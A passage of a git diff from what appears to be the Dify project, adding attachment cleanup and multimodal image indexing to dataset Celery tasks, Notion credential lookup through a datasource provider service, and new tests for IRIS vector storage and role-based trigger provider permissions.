{doc_form}", fg="yellow") ) @@ -90,6 +101,7 @@ def clean_dataset_task( for document in documents: db.session.delete(document) + # delete document file for segment in segments: image_upload_file_ids = get_image_upload_file_ids(segment.content) @@ -107,6 +119,19 @@ def clean_dataset_task( ) db.session.delete(image_file) db.session.delete(segment) + # delete segment attachments + if attachments_with_bindings: + for binding, attachment_file in attachments_with_bindings: + try: + storage.delete(attachment_file.key) + except Exception: + logger.exception( + "Delete attachment_file failed when storage deleted, \ + attachment_file_id: %s", + binding.attachment_id, + ) + db.session.delete(attachment_file) + db.session.delete(binding) db.session.query(DatasetProcessRule).where(DatasetProcessRule.dataset_id == dataset_id).delete() db.session.query(DatasetQuery).where(DatasetQuery.dataset_id == dataset_id).delete() @@ -114,6 +139,14 @@ def clean_dataset_task( # delete dataset metadata db.session.query(DatasetMetadata).where(DatasetMetadata.dataset_id == dataset_id).delete() db.session.query(DatasetMetadataBinding).where(DatasetMetadataBinding.dataset_id == dataset_id).delete() + # delete pipeline and workflow + if pipeline_id: + db.session.query(Pipeline).where(Pipeline.id == pipeline_id).delete() + db.session.query(Workflow).where( + Workflow.tenant_id == tenant_id, + Workflow.app_id == pipeline_id, + Workflow.type == WorkflowType.RAG_PIPELINE, + ).delete() # delete files if documents: for document in documents: diff --git a/api/tasks/clean_document_task.py b/api/tasks/clean_document_task.py index 62200715cc..6d2feb1da3 100644 --- a/api/tasks/clean_document_task.py +++ b/api/tasks/clean_document_task.py @@ -9,7 +9,7 @@ from core.rag.index_processor.index_processor_factory import IndexProcessorFacto from core.tools.utils.web_reader_tool import get_image_upload_file_ids from extensions.ext_database import db from extensions.ext_storage import storage -from models.dataset import Dataset, DatasetMetadataBinding, DocumentSegment +from models.dataset import Dataset, DatasetMetadataBinding, DocumentSegment, SegmentAttachmentBinding from models.model import UploadFile logger = logging.getLogger(__name__) @@ -36,6 +36,16 @@ def clean_document_task(document_id: str, dataset_id: str, doc_form: str, file_i raise Exception("Document has no dataset") segments = db.session.scalars(select(DocumentSegment).where(DocumentSegment.document_id == document_id)).all() + # Use JOIN to fetch attachments with bindings in a single query + attachments_with_bindings = db.session.execute( + select(SegmentAttachmentBinding, UploadFile) + .join(UploadFile, UploadFile.id == SegmentAttachmentBinding.attachment_id) + .where( + SegmentAttachmentBinding.tenant_id == dataset.tenant_id, + SegmentAttachmentBinding.dataset_id == dataset_id, + SegmentAttachmentBinding.document_id == document_id, + ) + ).all() # check segment is exist if segments: index_node_ids = [segment.index_node_id for segment in segments] @@ -69,6 +79,19 @@ def clean_document_task(document_id: str, dataset_id: str, doc_form: str, file_i logger.exception("Delete file failed when document deleted, file_id: %s", file_id) db.session.delete(file) db.session.commit() + # delete segment attachments + if attachments_with_bindings: + for binding, attachment_file in attachments_with_bindings: + try: + storage.delete(attachment_file.key) + except Exception: + logger.exception( + "Delete attachment_file failed when storage deleted, \ + attachment_file_id: %s", + binding.attachment_id, + ) + db.session.delete(attachment_file) + db.session.delete(binding) # delete dataset metadata binding db.session.query(DatasetMetadataBinding).where( diff --git a/api/tasks/deal_dataset_index_update_task.py b/api/tasks/deal_dataset_index_update_task.py index 713f149c38..3d13afdec0 100644 --- a/api/tasks/deal_dataset_index_update_task.py +++ b/api/tasks/deal_dataset_index_update_task.py @@ -4,9 +4,10 @@ import time import click from celery import shared_task # type: ignore -from core.rag.index_processor.constant.index_type import IndexType +from core.rag.index_processor.constant.doc_type import DocType +from core.rag.index_processor.constant.index_type import IndexStructureType from core.rag.index_processor.index_processor_factory import IndexProcessorFactory -from core.rag.models.document import ChildDocument, Document +from core.rag.models.document import AttachmentDocument, ChildDocument, Document from extensions.ext_database import db from models.dataset import Dataset, DocumentSegment from models.dataset import Document as DatasetDocument @@ -28,7 +29,7 @@ def deal_dataset_index_update_task(dataset_id: str, action: str): if not dataset: raise Exception("Dataset not found") - index_type = dataset.doc_form or IndexType.PARAGRAPH_INDEX + index_type = dataset.doc_form or IndexStructureType.PARAGRAPH_INDEX index_processor = IndexProcessorFactory(index_type).init_index_processor() if action == "upgrade": dataset_documents = ( @@ -119,6 +120,7 @@ def deal_dataset_index_update_task(dataset_id: str, action: str): ) if segments: documents = [] + multimodal_documents = [] for segment in segments: document = Document( page_content=segment.content, @@ -129,7 +131,7 @@ def deal_dataset_index_update_task(dataset_id: str, action: str): "dataset_id": segment.dataset_id, }, ) - if dataset_document.doc_form == IndexType.PARENT_CHILD_INDEX: + if dataset_document.doc_form == IndexStructureType.PARENT_CHILD_INDEX: child_chunks = segment.get_child_chunks() if child_chunks: child_documents = [] @@ -145,9 +147,25 @@ def deal_dataset_index_update_task(dataset_id: str, action: str): ) child_documents.append(child_document) document.children = child_documents + if dataset.is_multimodal: + for attachment in segment.attachments: + multimodal_documents.append( + AttachmentDocument( + page_content=attachment["name"], + metadata={ + "doc_id": attachment["id"], + "doc_hash": "", + "document_id": segment.document_id, + "dataset_id": segment.dataset_id, + "doc_type": DocType.IMAGE, + }, + ) + ) documents.append(document) # save vector index - index_processor.load(dataset, documents, with_keywords=False) + index_processor.load( + dataset, documents, multimodal_documents=multimodal_documents, with_keywords=False + ) db.session.query(DatasetDocument).where(DatasetDocument.id == dataset_document.id).update( {"indexing_status": "completed"}, synchronize_session=False ) diff --git a/api/tasks/deal_dataset_vector_index_task.py b/api/tasks/deal_dataset_vector_index_task.py index dc6ef6fb61..1c7de3b1ce 100644 --- a/api/tasks/deal_dataset_vector_index_task.py +++ b/api/tasks/deal_dataset_vector_index_task.py @@ -1,14 +1,14 @@ import logging import time -from typing import Literal import click from celery import shared_task from sqlalchemy import select -from core.rag.index_processor.constant.index_type import IndexType +from core.rag.index_processor.constant.doc_type import DocType +from core.rag.index_processor.constant.index_type import IndexStructureType from core.rag.index_processor.index_processor_factory import IndexProcessorFactory -from core.rag.models.document import ChildDocument, Document +from core.rag.models.document import AttachmentDocument, ChildDocument, Document from extensions.ext_database import db from models.dataset import Dataset, DocumentSegment from models.dataset import Document as DatasetDocument @@ -17,7 +17,7 @@ logger = logging.getLogger(__name__) @shared_task(queue="dataset") -def deal_dataset_vector_index_task(dataset_id: str, action: Literal["remove", "add", "update"]): +def deal_dataset_vector_index_task(dataset_id: str, action: str): """ Async deal dataset from index :param dataset_id: dataset_id @@ -32,7 +32,7 @@ def deal_dataset_vector_index_task(dataset_id: str, action: Literal["remove", "a if not dataset: raise Exception("Dataset not found") - index_type = dataset.doc_form or IndexType.PARAGRAPH_INDEX + index_type = dataset.doc_form or IndexStructureType.PARAGRAPH_INDEX index_processor = IndexProcessorFactory(index_type).init_index_processor() if action == "remove": index_processor.clean(dataset, None, with_keywords=False) @@ -119,6 +119,7 @@ def deal_dataset_vector_index_task(dataset_id: str, action: Literal["remove", "a ) if segments: documents = [] + multimodal_documents = [] for segment in segments: document = Document( page_content=segment.content, @@ -129,7 +130,7 @@ def deal_dataset_vector_index_task(dataset_id: str, action: Literal["remove", "a "dataset_id": segment.dataset_id, }, ) - if dataset_document.doc_form == IndexType.PARENT_CHILD_INDEX: + if dataset_document.doc_form == IndexStructureType.PARENT_CHILD_INDEX: child_chunks = segment.get_child_chunks() if child_chunks: child_documents = [] @@ -145,9 +146,25 @@ def deal_dataset_vector_index_task(dataset_id: str, action: Literal["remove", "a ) child_documents.append(child_document) document.children = child_documents + if dataset.is_multimodal: + for attachment in segment.attachments: + multimodal_documents.append( + AttachmentDocument( + page_content=attachment["name"], + metadata={ + "doc_id": attachment["id"], + "doc_hash": "", + "document_id": segment.document_id, + "dataset_id": segment.dataset_id, + "doc_type": DocType.IMAGE, + }, + ) + ) documents.append(document) # save vector index - index_processor.load(dataset, documents, with_keywords=False) + index_processor.load( + dataset, documents, multimodal_documents=multimodal_documents, with_keywords=False + ) db.session.query(DatasetDocument).where(DatasetDocument.id == dataset_document.id).update( {"indexing_status": "completed"}, synchronize_session=False ) diff --git a/api/tasks/delete_account_task.py b/api/tasks/delete_account_task.py index fb5eb1d691..cb703cc263 100644 --- a/api/tasks/delete_account_task.py +++ b/api/tasks/delete_account_task.py @@ -2,6 +2,7 @@ import logging from celery import shared_task +from configs import dify_config from extensions.ext_database import db from models import Account from services.billing_service import BillingService @@ -14,7 +15,8 @@ logger = logging.getLogger(__name__) def delete_account_task(account_id): account = db.session.query(Account).where(Account.id == account_id).first() try: - BillingService.delete_account(account_id) + if dify_config.BILLING_ENABLED: + BillingService.delete_account(account_id) except Exception: logger.exception("Failed to delete account %s from billing service.", account_id) raise diff --git a/api/tasks/delete_segment_from_index_task.py b/api/tasks/delete_segment_from_index_task.py index e8cbd0f250..bea5c952cf 100644 --- a/api/tasks/delete_segment_from_index_task.py +++ b/api/tasks/delete_segment_from_index_task.py @@ -6,14 +6,15 @@ from celery import shared_task from core.rag.index_processor.index_processor_factory import IndexProcessorFactory from extensions.ext_database import db -from models.dataset import Dataset, Document +from models.dataset import Dataset, Document, SegmentAttachmentBinding +from models.model import UploadFile logger = logging.getLogger(__name__) @shared_task(queue="dataset") def delete_segment_from_index_task( - index_node_ids: list, dataset_id: str, document_id: str, child_node_ids: list | None = None + index_node_ids: list, dataset_id: str, document_id: str, segment_ids: list, child_node_ids: list | None = None ): """ Async Remove segment from index @@ -49,6 +50,21 @@ def delete_segment_from_index_task( delete_child_chunks=True, precomputed_child_node_ids=child_node_ids, ) + if dataset.is_multimodal: + # delete segment attachment binding + segment_attachment_bindings = ( + db.session.query(SegmentAttachmentBinding) + .where(SegmentAttachmentBinding.segment_id.in_(segment_ids)) + .all() + ) + if segment_attachment_bindings: + attachment_ids = [binding.attachment_id for binding in segment_attachment_bindings] + index_processor.clean(dataset=dataset, node_ids=attachment_ids, with_keywords=False) + for binding in segment_attachment_bindings: + db.session.delete(binding) + # delete upload file + db.session.query(UploadFile).where(UploadFile.id.in_(attachment_ids)).delete(synchronize_session=False) + db.session.commit() end_at = time.perf_counter() logger.info(click.style(f"Segment deleted from index latency: {end_at - start_at}", fg="green")) diff --git a/api/tasks/disable_segments_from_index_task.py b/api/tasks/disable_segments_from_index_task.py index 9038dc179b..c2a3de29f4 100644 --- a/api/tasks/disable_segments_from_index_task.py +++ b/api/tasks/disable_segments_from_index_task.py @@ -8,7 +8,7 @@ from sqlalchemy import select from core.rag.index_processor.index_processor_factory import IndexProcessorFactory from extensions.ext_database import db from extensions.ext_redis import redis_client -from models.dataset import Dataset, DocumentSegment +from models.dataset import Dataset, DocumentSegment, SegmentAttachmentBinding from models.dataset import Document as DatasetDocument logger = logging.getLogger(__name__) @@ -59,6 +59,16 @@ def disable_segments_from_index_task(segment_ids: list, dataset_id: str, documen try: index_node_ids = [segment.index_node_id for segment in segments] + if dataset.is_multimodal: + segment_ids = [segment.id for segment in segments] + segment_attachment_bindings = ( + db.session.query(SegmentAttachmentBinding) + .where(SegmentAttachmentBinding.segment_id.in_(segment_ids)) + .all() + ) + if segment_attachment_bindings: + attachment_ids = [binding.attachment_id for binding in segment_attachment_bindings] + index_node_ids.extend(attachment_ids) index_processor.clean(dataset, index_node_ids, with_keywords=True, delete_child_chunks=False) end_at = time.perf_counter() diff --git a/api/tasks/document_indexing_sync_task.py b/api/tasks/document_indexing_sync_task.py index 4c1f38c3bb..5fc2597c92 100644 --- a/api/tasks/document_indexing_sync_task.py +++ b/api/tasks/document_indexing_sync_task.py @@ -2,7 +2,6 @@ import logging import time import click -import sqlalchemy as sa from celery import shared_task from sqlalchemy import select @@ -12,7 +11,7 @@ from core.rag.index_processor.index_processor_factory import IndexProcessorFacto from extensions.ext_database import db from libs.datetime_utils import naive_utc_now from models.dataset import Dataset, Document, DocumentSegment -from models.source import DataSourceOauthBinding +from services.datasource_provider_service import DatasourceProviderService logger = logging.getLogger(__name__) @@ -48,27 +47,36 @@ def document_indexing_sync_task(dataset_id: str, document_id: str): page_id = data_source_info["notion_page_id"] page_type = data_source_info["type"] page_edited_time = data_source_info["last_edited_time"] + credential_id = data_source_info.get("credential_id") - data_source_binding = ( - db.session.query(DataSourceOauthBinding) - .where( - sa.and_( - DataSourceOauthBinding.tenant_id == document.tenant_id, - DataSourceOauthBinding.provider == "notion", - DataSourceOauthBinding.disabled == False, - DataSourceOauthBinding.source_info["workspace_id"] == f'"{workspace_id}"', - ) - ) - .first() + # Get credentials from datasource provider + datasource_provider_service = DatasourceProviderService() + credential = datasource_provider_service.get_datasource_credentials( + tenant_id=document.tenant_id, + credential_id=credential_id, + provider="notion_datasource", + plugin_id="langgenius/notion_datasource", ) - if not data_source_binding: - raise ValueError("Data source binding not found.") + + if not credential: + logger.error( + "Datasource credential not found for document %s, tenant_id: %s, credential_id: %s", + document_id, + document.tenant_id, + credential_id, + ) + document.indexing_status = "error" + document.error = "Datasource credential not found. Please reconnect your Notion workspace." + document.stopped_at = naive_utc_now() + db.session.commit() + db.session.close() + return loader = NotionExtractor( notion_workspace_id=workspace_id, notion_obj_id=page_id, notion_page_type=page_type, - notion_access_token=data_source_binding.access_token, + notion_access_token=credential.get("integration_secret"), tenant_id=document.tenant_id, ) diff --git a/api/tasks/enable_segment_to_index_task.py b/api/tasks/enable_segment_to_index_task.py index 07c44f333e..7615469ed0 100644 --- a/api/tasks/enable_segment_to_index_task.py +++ b/api/tasks/enable_segment_to_index_task.py @@ -4,9 +4,10 @@ import time import click from celery import shared_task -from core.rag.index_processor.constant.index_type import IndexType +from core.rag.index_processor.constant.doc_type import DocType +from core.rag.index_processor.constant.index_type import IndexStructureType from core.rag.index_processor.index_processor_factory import IndexProcessorFactory -from core.rag.models.document import ChildDocument, Document +from core.rag.models.document import AttachmentDocument, ChildDocument, Document from extensions.ext_database import db from extensions.ext_redis import redis_client from libs.datetime_utils import naive_utc_now @@ -67,7 +68,7 @@ def enable_segment_to_index_task(segment_id: str): return index_processor = IndexProcessorFactory(dataset_document.doc_form).init_index_processor() - if dataset_document.doc_form == IndexType.PARENT_CHILD_INDEX: + if dataset_document.doc_form == IndexStructureType.PARENT_CHILD_INDEX: child_chunks = segment.get_child_chunks() if child_chunks: child_documents = [] @@ -83,8 +84,24 @@ def enable_segment_to_index_task(segment_id: str): ) child_documents.append(child_document) document.children = child_documents + multimodel_documents = [] + if dataset.is_multimodal: + for attachment in segment.attachments: + multimodel_documents.append( + AttachmentDocument( + page_content=attachment["name"], + metadata={ + "doc_id": attachment["id"], + "doc_hash": "", + "document_id": segment.document_id, + "dataset_id": segment.dataset_id, + "doc_type": DocType.IMAGE, + }, + ) + ) + # save vector index - index_processor.load(dataset, [document]) + index_processor.load(dataset, [document], multimodal_documents=multimodel_documents) end_at = time.perf_counter() logger.info(click.style(f"Segment enabled to index: {segment.id} latency: {end_at - start_at}", fg="green")) diff --git a/api/tasks/enable_segments_to_index_task.py b/api/tasks/enable_segments_to_index_task.py index c5ca7a6171..9f17d09e18 100644 --- a/api/tasks/enable_segments_to_index_task.py +++ b/api/tasks/enable_segments_to_index_task.py @@ -5,9 +5,10 @@ import click from celery import shared_task from sqlalchemy import select -from core.rag.index_processor.constant.index_type import IndexType +from core.rag.index_processor.constant.doc_type import DocType +from core.rag.index_processor.constant.index_type import IndexStructureType from core.rag.index_processor.index_processor_factory import IndexProcessorFactory -from core.rag.models.document import ChildDocument, Document +from core.rag.models.document import AttachmentDocument, ChildDocument, Document from extensions.ext_database import db from extensions.ext_redis import redis_client from libs.datetime_utils import naive_utc_now @@ -60,6 +61,7 @@ def enable_segments_to_index_task(segment_ids: list, dataset_id: str, document_i try: documents = [] + multimodal_documents = [] for segment in segments: document = Document( page_content=segment.content, @@ -71,7 +73,7 @@ def enable_segments_to_index_task(segment_ids: list, dataset_id: str, document_i }, ) - if dataset_document.doc_form == IndexType.PARENT_CHILD_INDEX: + if dataset_document.doc_form == IndexStructureType.PARENT_CHILD_INDEX: child_chunks = segment.get_child_chunks() if child_chunks: child_documents = [] @@ -87,9 +89,24 @@ def enable_segments_to_index_task(segment_ids: list, dataset_id: str, document_i ) child_documents.append(child_document) document.children = child_documents + + if dataset.is_multimodal: + for attachment in segment.attachments: + multimodal_documents.append( + AttachmentDocument( + page_content=attachment["name"], + metadata={ + "doc_id": attachment["id"], + "doc_hash": "", + "document_id": segment.document_id, + "dataset_id": segment.dataset_id, + "doc_type": DocType.IMAGE, + }, + ) + ) documents.append(document) # save vector index - index_processor.load(dataset, documents) + index_processor.load(dataset, documents, multimodal_documents=multimodal_documents) end_at = time.perf_counter() logger.info(click.style(f"Segments enabled to index latency: {end_at - start_at}", fg="green")) diff --git a/api/tests/fixtures/workflow/end_node_without_value_type_field_workflow.yml b/api/tests/fixtures/workflow/end_node_without_value_type_field_workflow.yml new file mode 100644 index 0000000000..a69339691d --- /dev/null +++ b/api/tests/fixtures/workflow/end_node_without_value_type_field_workflow.yml @@ -0,0 +1,127 @@ +app: + description: 'End node without value_type field reproduction' + icon: 🤖 + icon_background: '#FFEAD5' + mode: workflow + name: end_node_without_value_type_field_reproduction + use_icon_as_answer_icon: false +dependencies: [] +kind: app +version: 0.5.0 +workflow: + conversation_variables: [] + environment_variables: [] + features: + file_upload: + allowed_file_extensions: + - .JPG + - .JPEG + - .PNG + - .GIF + - .WEBP + - .SVG + allowed_file_types: + - image + allowed_file_upload_methods: + - local_file + - remote_url + enabled: false + fileUploadConfig: + audio_file_size_limit: 50 + batch_count_limit: 5 + file_size_limit: 15 + image_file_batch_limit: 10 + image_file_size_limit: 10 + single_chunk_attachment_limit: 10 + video_file_size_limit: 100 + workflow_file_upload_limit: 10 + image: + enabled: false + number_limits: 3 + transfer_methods: + - local_file + - remote_url + number_limits: 3 + opening_statement: '' + retriever_resource: + enabled: true + sensitive_word_avoidance: + enabled: false + speech_to_text: + enabled: false + suggested_questions: [] + suggested_questions_after_answer: + enabled: false + text_to_speech: + enabled: false + language: '' + voice: '' + graph: + edges: + - data: + isInIteration: false + isInLoop: false + sourceType: start + targetType: end + id: 1765423445456-source-1765423454810-target + source: '1765423445456' + sourceHandle: source + target: '1765423454810' + targetHandle: target + type: custom + zIndex: 0 + nodes: + - data: + selected: false + title: 用户输入 + type: start + variables: + - default: '' + hint: '' + label: query + max_length: 48 + options: [] + placeholder: '' + required: true + type: text-input + variable: query + height: 109 + id: '1765423445456' + position: + x: -48 + y: 261 + positionAbsolute: + x: -48 + y: 261 + selected: false + sourcePosition: right + targetPosition: left + type: custom + width: 242 + - data: + outputs: + - value_selector: + - '1765423445456' + - query + variable: query + selected: true + title: 输出 + type: end + height: 88 + id: '1765423454810' + position: + x: 382 + y: 282 + positionAbsolute: + x: 382 + y: 282 + selected: true + sourcePosition: right + targetPosition: left + type: custom + width: 242 + viewport: + x: 139 + y: -135 + zoom: 1 + rag_pipeline_variables: [] diff --git a/api/tests/integration_tests/.env.example b/api/tests/integration_tests/.env.example index e508ceef66..acc268f1d4 100644 --- a/api/tests/integration_tests/.env.example +++ b/api/tests/integration_tests/.env.example @@ -55,7 +55,7 @@ WEB_API_CORS_ALLOW_ORIGINS=http://127.0.0.1:3000,* CONSOLE_CORS_ALLOW_ORIGINS=http://127.0.0.1:3000,* # Vector database configuration -# support: weaviate, qdrant, milvus, myscale, relyt, pgvecto_rs, pgvector, pgvector, chroma, opensearch, tidb_vector, couchbase, vikingdb, upstash, lindorm, oceanbase +# support: weaviate, qdrant, milvus, myscale, relyt, pgvecto_rs, pgvector, pgvector, chroma, opensearch, tidb_vector, couchbase, vikingdb, upstash, lindorm, oceanbase, iris VECTOR_STORE=weaviate # Weaviate configuration WEAVIATE_ENDPOINT=http://localhost:8080 @@ -64,6 +64,20 @@ WEAVIATE_GRPC_ENABLED=false WEAVIATE_BATCH_SIZE=100 WEAVIATE_TOKENIZATION=word +# InterSystems IRIS configuration +IRIS_HOST=localhost +IRIS_SUPER_SERVER_PORT=1972 +IRIS_WEB_SERVER_PORT=52773 +IRIS_USER=_SYSTEM +IRIS_PASSWORD=Dify@1234 +IRIS_DATABASE=USER +IRIS_SCHEMA=dify +IRIS_CONNECTION_URL= +IRIS_MIN_CONNECTION=1 +IRIS_MAX_CONNECTION=3 +IRIS_TEXT_INDEX=true +IRIS_TEXT_INDEX_LANGUAGE=en + # Upload configuration UPLOAD_FILE_SIZE_LIMIT=15 diff --git a/api/tests/integration_tests/conftest.py b/api/tests/integration_tests/conftest.py index 4395a9815a..948cf8b3a0 100644 --- a/api/tests/integration_tests/conftest.py +++ b/api/tests/integration_tests/conftest.py @@ -1,3 +1,4 @@ +import os import pathlib import random import secrets @@ -32,6 +33,10 @@ def _load_env(): _load_env() +# Override storage root to tmp to avoid polluting repo during local runs +os.environ["OPENDAL_FS_ROOT"] = "/tmp/dify-storage" +os.environ.setdefault("STORAGE_TYPE", "opendal") +os.environ.setdefault("OPENDAL_SCHEME", "fs") _CACHED_APP = create_app() diff --git a/api/tests/integration_tests/controllers/console/workspace/test_trigger_provider_permissions.py b/api/tests/integration_tests/controllers/console/workspace/test_trigger_provider_permissions.py new file mode 100644 index 0000000000..e55c12e678 --- /dev/null +++ b/api/tests/integration_tests/controllers/console/workspace/test_trigger_provider_permissions.py @@ -0,0 +1,244 @@ +"""Integration tests for Trigger Provider subscription permission verification.""" + +import uuid +from unittest import mock + +import pytest +from flask.testing import FlaskClient + +from controllers.console.workspace import trigger_providers as trigger_providers_api +from libs.datetime_utils import naive_utc_now +from models import Tenant +from models.account import Account, TenantAccountJoin, TenantAccountRole + + +class TestTriggerProviderSubscriptionPermissions: + """Test permission verification for Trigger Provider subscription endpoints.""" + + @pytest.fixture + def mock_account(self, monkeypatch: pytest.MonkeyPatch): + """Create a mock Account for testing.""" + + account = Account(name="Test User", email="test@example.com") + account.id = str(uuid.uuid4()) + account.last_active_at = naive_utc_now() + account.created_at = naive_utc_now() + account.updated_at = naive_utc_now() + + # Create mock tenant + tenant = Tenant(name="Test Tenant") + tenant.id = str(uuid.uuid4()) + + mock_session_instance = mock.Mock() + + mock_tenant_join = TenantAccountJoin(role=TenantAccountRole.OWNER) + monkeypatch.setattr(mock_session_instance, "scalar", mock.Mock(return_value=mock_tenant_join)) + + mock_scalars_result = mock.Mock() + mock_scalars_result.one.return_value = tenant + monkeypatch.setattr(mock_session_instance, "scalars", mock.Mock(return_value=mock_scalars_result)) + + mock_session_context = mock.Mock() + mock_session_context.__enter__.return_value = mock_session_instance + monkeypatch.setattr("models.account.Session", lambda _, expire_on_commit: mock_session_context) + + account.current_tenant = tenant + account.current_tenant_id = tenant.id + return account + + @pytest.mark.parametrize( + ("role", "list_status", "get_status", "update_status", "create_status", "build_status", "delete_status"), + [ + # Admin/Owner can do everything + (TenantAccountRole.OWNER, 200, 200, 200, 200, 200, 200), + (TenantAccountRole.ADMIN, 200, 200, 200, 200, 200, 200), + # Editor can list, get, update (parameters), but not create, build, or delete + (TenantAccountRole.EDITOR, 200, 200, 200, 403, 403, 403), + # Normal user cannot do anything + (TenantAccountRole.NORMAL, 403, 403, 403, 403, 403, 403), + # Dataset operator cannot do anything + (TenantAccountRole.DATASET_OPERATOR, 403, 403, 403, 403, 403, 403), + ], + ) + def test_trigger_subscription_permissions( + self, + test_client: FlaskClient, + auth_header, + monkeypatch, + mock_account, + role: TenantAccountRole, + list_status: int, + get_status: int, + update_status: int, + create_status: int, + build_status: int, + delete_status: int, + ): + """Test that different roles have appropriate permissions for trigger subscription operations.""" + # Set user role + mock_account.role = role + + # Mock current user + monkeypatch.setattr(trigger_providers_api, "current_user", mock_account) + + # Mock AccountService.load_user to prevent authentication issues + from services.account_service import AccountService + + mock_load_user = mock.Mock(return_value=mock_account) + monkeypatch.setattr(AccountService, "load_user", mock_load_user) + + # Test data + provider = "some_provider/some_trigger" + subscription_builder_id = str(uuid.uuid4()) + subscription_id = str(uuid.uuid4()) + + # Mock service methods + mock_list_subscriptions = mock.Mock(return_value=[]) + monkeypatch.setattr( + "services.trigger.trigger_provider_service.TriggerProviderService.list_trigger_provider_subscriptions", + mock_list_subscriptions, + ) + + mock_get_subscription_builder = mock.Mock(return_value={"id": subscription_builder_id}) + monkeypatch.setattr( + "services.trigger.trigger_subscription_builder_service.TriggerSubscriptionBuilderService.get_subscription_builder_by_id", + mock_get_subscription_builder, + ) + + mock_update_subscription_builder = mock.Mock(return_value={"id": subscription_builder_id}) + monkeypatch.setattr( + "services.trigger.trigger_subscription_builder_service.TriggerSubscriptionBuilderService.update_trigger_subscription_builder", + mock_update_subscription_builder, + ) + + mock_create_subscription_builder = mock.Mock(return_value={"id": subscription_builder_id}) + monkeypatch.setattr( + "services.trigger.trigger_subscription_builder_service.TriggerSubscriptionBuilderService.create_trigger_subscription_builder", + mock_create_subscription_builder, + ) + + mock_update_and_build_builder = mock.Mock() + monkeypatch.setattr( + "services.trigger.trigger_subscription_builder_service.TriggerSubscriptionBuilderService.update_and_build_builder", + mock_update_and_build_builder, + ) + + mock_delete_provider = mock.Mock() + mock_delete_plugin_trigger = mock.Mock() + mock_db_session = mock.Mock() + mock_db_session.commit = mock.Mock() + + def mock_session_func(engine=None): + return mock_session_context + + mock_session_context = mock.Mock() + mock_session_context.__enter__.return_value = mock_db_session + mock_session_context.__exit__.return_value = None + + monkeypatch.setattr("services.trigger.trigger_provider_service.Session", mock_session_func) + monkeypatch.setattr("services.trigger.trigger_subscription_operator_service.Session", mock_session_func) + + monkeypatch.setattr( + "services.trigger.trigger_provider_service.TriggerProviderService.delete_trigger_provider", + mock_delete_provider, + ) + monkeypatch.setattr( + "services.trigger.trigger_subscription_operator_service.TriggerSubscriptionOperatorService.delete_plugin_trigger_by_subscription", + mock_delete_plugin_trigger, + ) + + # Test 1: List subscriptions (should work for Editor, Admin, Owner) + response = test_client.get( + f"/console/api/workspaces/current/trigger-provider/{provider}/subscriptions/list", + headers=auth_header, + ) + assert response.status_code == list_status + + # Test 2: Get subscription builder (should work for Editor, Admin, Owner) + response = test_client.get( + f"/console/api/workspaces/current/trigger-provider/{provider}/subscriptions/builder/{subscription_builder_id}", + headers=auth_header, + ) + assert response.status_code == get_status + + # Test 3: Update subscription builder parameters (should work for Editor, Admin, Owner) + response = test_client.post( + f"/console/api/workspaces/current/trigger-provider/{provider}/subscriptions/builder/update/{subscription_builder_id}", + headers=auth_header, + json={"parameters": {"webhook_url": "https://example.com/webhook"}}, + ) + assert response.status_code == update_status + + # Test 4: Create subscription builder (should only work for Admin, Owner) + response = test_client.post( + f"/console/api/workspaces/current/trigger-provider/{provider}/subscriptions/builder/create", + headers=auth_header, + json={"credential_type": "api_key"}, + ) + assert response.status_code == create_status + + # Test 5: Build/activate subscription (should only work for Admin, Owner) + response = test_client.post( + f"/console/api/workspaces/current/trigger-provider/{provider}/subscriptions/builder/build/{subscription_builder_id}", + headers=auth_header, + json={"name": "Test Subscription"}, + ) + assert response.status_code == build_status + + # Test 6: Delete subscription (should only work for Admin, Owner) + response = test_client.post( + f"/console/api/workspaces/current/trigger-provider/{subscription_id}/subscriptions/delete", + headers=auth_header, + ) + assert response.status_code == delete_status + + @pytest.mark.parametrize( + ("role", "status"), + [ + (TenantAccountRole.OWNER, 200), + (TenantAccountRole.ADMIN, 200), + # Editor should be able to access logs for debugging + (TenantAccountRole.EDITOR, 200), + (TenantAccountRole.NORMAL, 403), + (TenantAccountRole.DATASET_OPERATOR, 403), + ], + ) + def test_trigger_subscription_logs_permissions( + self, + test_client: FlaskClient, + auth_header, + monkeypatch, + mock_account, + role: TenantAccountRole, + status: int, + ): + """Test that different roles have appropriate permissions for accessing subscription logs.""" + # Set user role + mock_account.role = role + + # Mock current user + monkeypatch.setattr(trigger_providers_api, "current_user", mock_account) + + # Mock AccountService.load_user to prevent authentication issues + from services.account_service import AccountService + + mock_load_user = mock.Mock(return_value=mock_account) + monkeypatch.setattr(AccountService, "load_user", mock_load_user) + + # Test data + provider = "some_provider/some_trigger" + subscription_builder_id = str(uuid.uuid4()) + + # Mock service method + mock_list_logs = mock.Mock(return_value=[]) + monkeypatch.setattr( + "services.trigger.trigger_subscription_builder_service.TriggerSubscriptionBuilderService.list_logs", + mock_list_logs, + ) + + # Test access to logs + response = test_client.get( + f"/console/api/workspaces/current/trigger-provider/{provider}/subscriptions/builder/logs/{subscription_builder_id}", + headers=auth_header, + ) + assert response.status_code == status diff --git a/api/tests/integration_tests/vdb/iris/__init__.py b/api/tests/integration_tests/vdb/iris/__init__.py new file mode 100644 index 0000000000..e69de29bb2 diff --git a/api/tests/integration_tests/vdb/iris/test_iris.py b/api/tests/integration_tests/vdb/iris/test_iris.py new file mode 100644 index 0000000000..49f6857743 --- /dev/null +++ b/api/tests/integration_tests/vdb/iris/test_iris.py @@ -0,0 +1,44 @@ +"""Integration tests for IRIS vector database.""" + +from core.rag.datasource.vdb.iris.iris_vector import IrisVector, IrisVectorConfig +from tests.integration_tests.vdb.test_vector_store import ( + AbstractVectorTest, + setup_mock_redis, +) + + +class IrisVectorTest(AbstractVectorTest): + """Test suite for IRIS vector store implementation.""" + + def __init__(self): + """Initialize IRIS vector test with hardcoded test configuration. + + Note: Uses 'host.docker.internal' to connect from DevContainer to + host OS Docker, or 'localhost' when running directly on host OS. + """ + super().__init__() + self.vector = IrisVector( + collection_name=self.collection_name, + config=IrisVectorConfig( + IRIS_HOST="host.docker.internal", + IRIS_SUPER_SERVER_PORT=1972, + IRIS_USER="_SYSTEM", + IRIS_PASSWORD="Dify@1234", + IRIS_DATABASE="USER", + IRIS_SCHEMA="dify", + IRIS_CONNECTION_URL=None, + IRIS_MIN_CONNECTION=1, + IRIS_MAX_CONNECTION=3, + IRIS_TEXT_INDEX=True, + IRIS_TEXT_INDEX_LANGUAGE="en", + ), + ) + + +def test_iris_vector(setup_mock_redis) -> None: + """Run all IRIS vector store tests. + + Args: + setup_mock_redis: Pytest fixture for mock Redis setup + """ + IrisVectorTest().run_all_tests() diff --git a/api/tests/integration_tests/workflow/nodes/test_http.py 